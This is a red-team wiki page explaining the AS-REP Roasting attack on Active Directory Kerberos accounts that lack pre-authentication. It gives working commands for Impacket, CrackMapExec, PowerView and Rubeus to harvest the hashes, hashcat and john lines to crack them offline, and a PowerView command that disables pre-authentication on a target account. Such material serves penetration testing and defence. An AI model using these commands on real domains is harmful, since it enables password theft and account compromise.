AS-REP Roasting

When requesting a TGT, the user must, by default, authenticate himself to the KDC (Key Distribution Center) for it to respond. This is known as Kerberos pre-authentication, meaning that a user will send an encrypted timestamp with his Kerberos key to the KDC in the AS-REQ message (to request a TGT).

When we talk about the notion of TGT, it's often a misnomer, as we're actually talking about the KRB_AS_REP, which contains the TGT (encrypted with the KDC's secret) and the session key (encrypted with the user account's secret).

As part of the KDC response is encrypted with the client account secret (the session key), it is important that this information is not accessible without authentication. If this were the case, anyone could request a TGT for a given account, and attempt to decrypt the encrypted part of the KRB_AS_REP response to retrieve the targeted user's password.

However, on rare occasions, Kerberos pre-authentication may be disabled for an account (the DONT_REQUIRE_PREAUTH attribute is checked). As a result, pre-authentication is no longer required for these accounts, allowing an attacker to abuse this configuration.

Thus, anyone can impersonate these accounts by sending an AS-REQ message, and an AS-REP response will be returned by the KDC with data encrypted with the user's hash.

Once in possession of the KRB_AS_REP KDC response, the attacker can attempt to break the hash of this offline password and thus obtain the targeted victim's password in cleartext.

The AS_REP Roasting attack consists in identifying users without the required Kerberos pre-authentication and sending an AS-REQ request on their behalf, in order to retrieve the data element encrypted with the user hash in the AS-REP message. Once the data has been retrieved, an offline cracking attack is carried out in an attempt to recover the user's password.

It is important to note that pre-authentication is enabled by default and must be disabled manually.

Impacket :

python GetNPUsers.py <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile hashes_asreproast.txt

CrackMapExec :

cme ldap <IP> -u <USERNAME> -p '<PASSWORD>' --asreproast hashes_asreproast.txt

PowerView :

Get-DomainUser -PreauthNotRequired -verbose

Rubeus :

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes_asreproast.txt

Cracking :

john --wordlist=passwords_kerb.txt hashes_asreproast.txt
hashcat -m 18200 --force -a 0 hashes_asreproast.txt passwords_kerb.txt

RedTeam POV:

With sufficient rights (GenericAll/GenericWrite) an attacker can force the "pre-authentication not required" on a user :

Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

References :

PreviousKerberoasting NextPass the Hash/Ticket

Last updated 1 year ago

Was this helpful?